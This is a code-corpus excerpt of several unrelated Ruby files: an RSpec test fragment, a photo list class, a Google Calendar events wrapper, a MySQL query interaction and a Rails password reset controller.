allow(out).to receive(:name).with().and_return(:quux)
out
end
it "should be able to create a new category, and retrieve it" do
blk = lambda { :whatever }
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, ' FooBar ', :bar => :baz) do |*args, &block|
expect(block).to eq(blk)
end.and_return(category)
instance.category(' FooBar ', :bar => :baz, &blk)
expect(instance.category_named(:quux)).to be(category)
end
it "should not allow creating duplicate categories" do
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :quux, { }).and_return(category)
instance.category(:quux)
category_2 = double("category-2")
allow(category_2).to receive(:name).with().and_return(:quux)
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :baz, { }).and_return(category_2)
expect { instance.category(:baz) }.to raise_error(ArgumentError, /baz/i)
end
it "should allow retrieving the category, and normalize the name" do
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :quux, { }).and_return(category)
instance.category(:quux)
      expect(instance.category_named(' QuuX ')).to be(category)
end
it "should delegate to the category on #fetch_event" do
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :quux, { }).and_return(category)
instance.category(:quux)
expect(category).to receive(:event_named).once.with(:foobar).and_return(:bonk)
      expect(instance.fetch_event(:quux, :foobar)).to eq(:bonk)
end
end
it "should return the #retired_at properly" do
expect(instance.retired_at).to be_nil
new_instance = klass.new(definition_set, 4, "2014-01-01", :retired_at => "2015-01-01")
expect(new_instance.retired_at).to eq(Time.parse("2015-01-01"))
end
it "should turn itself into a string reasonably" do
expect(instance.to_s).to match(/Version/)
expect(instance.to_s).to match(/3/)
end
end
| 39.44 | 130 | 0.692191 |
f8f4bd76f9842dcaa244ab8b52639b17073263af | 889 | class PhotoList
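  # Holds photos newest-first (by added_at); filtering by tag or collection
  # returns a fresh PhotoList rather than mutating this one.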
attr_reader :photos
def initialize(photos)
@photos = photos.sort_by { |photo| photo.added_at }.reverse
end
def with_tag(tag)
PhotoList.new(@photos.find_all { |photo| photo.tags.include?(tag) })
end
def with_collection(collection)
PhotoList.new(@photos.find_all { |photo| photo.collections.include?(collection) })
end
def find(uuid)
@photos.find { |photo| photo.uuid == uuid }
end
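  # Neighbours in display order: item_before answers false when the item is
  # already first, while item_after simply returns nil past the last element.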
def item_before(item)
item_index = @photos.find_index(item)
if item_index > 0
@photos[item_index-1]
else
false
end
end
def item_after(item)
item_index = @photos.find_index(item)
@photos[item_index+1]
end
def page_number_for(item)
((@photos.index(item) + 1) / Paginatable::PER_PAGE.to_f).ceil
end
def slice(start, length)
photos.slice(start, length)
end
def size
photos.size
end
end
| 19.326087 | 86 | 0.670416 |
1cd80586ef06ac0a4e3c13cacd320c4e5f8d41f9 | 712 | module GoogleApps
class EventsList < Events
def events_list(optional_params={})
optional_params.reverse_merge!(:calendarId => 'primary', :maxResults => 1000)
    # The Events API is quick, but 2000+ events within a day would be a little absurd.
request :api => "calendar", :resource => "events", :method => "list", :params => optional_params,
:page_limiter => 2
end
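    # Fixture filename for recorded responses; a request carrying a pageToken
    # is treated as page two and gets a "_page2" suffix.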
def json_filename
page = @params[:params]['pageToken'].present? ? '_page2' : ''
"google_events_list_#{@params[:params][:maxResults]}#{page}.json"
end
def mock_request
super.merge(uri_matching: 'https://www.googleapis.com/calendar/v3/calendars/primary/events')
end
end
end
| 32.363636 | 103 | 0.657303 |
d5705587bcd0dd56168017c0899a75a4a3d3c2f3 | 665 | # frozen_string_literal: true
class MysqlQuery < ActiveInteraction::Base
object :data_source, class: DataSource
string :db_query
validates :db_query, :data_source, presence: true
def execute
ActiveRecord::Base.transaction do
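      # Settings keep the MySQL user under "user"; "password", when present,
      # holds a Locker record id whose enkrypted value is the real password.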
username = data_source.settings.delete("user")
if data_source.settings["password"].present?
locker_id = data_source.settings.delete("password")
password = Locker.find(locker_id).enkrypted
else
password = ""
end
connection = Mysql2::Client.new(data_source.settings.merge({ username: username, password: password }))
connection.query(db_query).to_a
end
end
end
| 28.913043 | 109 | 0.705263 |
e8759791d74a5bd542db36e85d241225baeafc69 | 1,398 | class PasswordResetsController < ApplicationController
before_action :get_user, only: [:edit, :update]
before_action :valid_user, only: [:edit, :update]
before_action :check_expiration, only: [:edit, :update]
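  # Edit/update requests must reference an existing, activated user with a
  # valid reset token, and must arrive before the reset digest expires.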
def new
end
def create
@user = User.find_by(email: params[:password_reset][:email].downcase)
if @user
@user.create_reset_digest
@user.send_password_reset_email
flash[:info] = "Email sent with password reset instructions"
redirect_to root_url
else
flash.now[:danger] = "Email address not found"
render "new"
end
end
def edit
end
def update
if params[:user][:password].empty?
@user.errors.add(:password, :blank)
render "edit"
elsif @user.update_attributes(user_params)
log_in @user
flash[:success] = "Password has been reset."
redirect_to @user
else
render "edit"
end
end
private
def user_params
params.require(:user).permit(:password, :password_confirmation)
end
def get_user
@user = User.find_by(email: params[:email])
end
def valid_user
unless (@user && @user.activated? && @user.authenticated?(:reset, params[:id]))
redirect_to root_url
end
end
def check_expiration
if @user.password_reset_expired?
flash[:danger] = "Password reset has expired"
redirect_to new_password_reset_url
end
end
end
| 22.918033 | 83 | 0.67382 |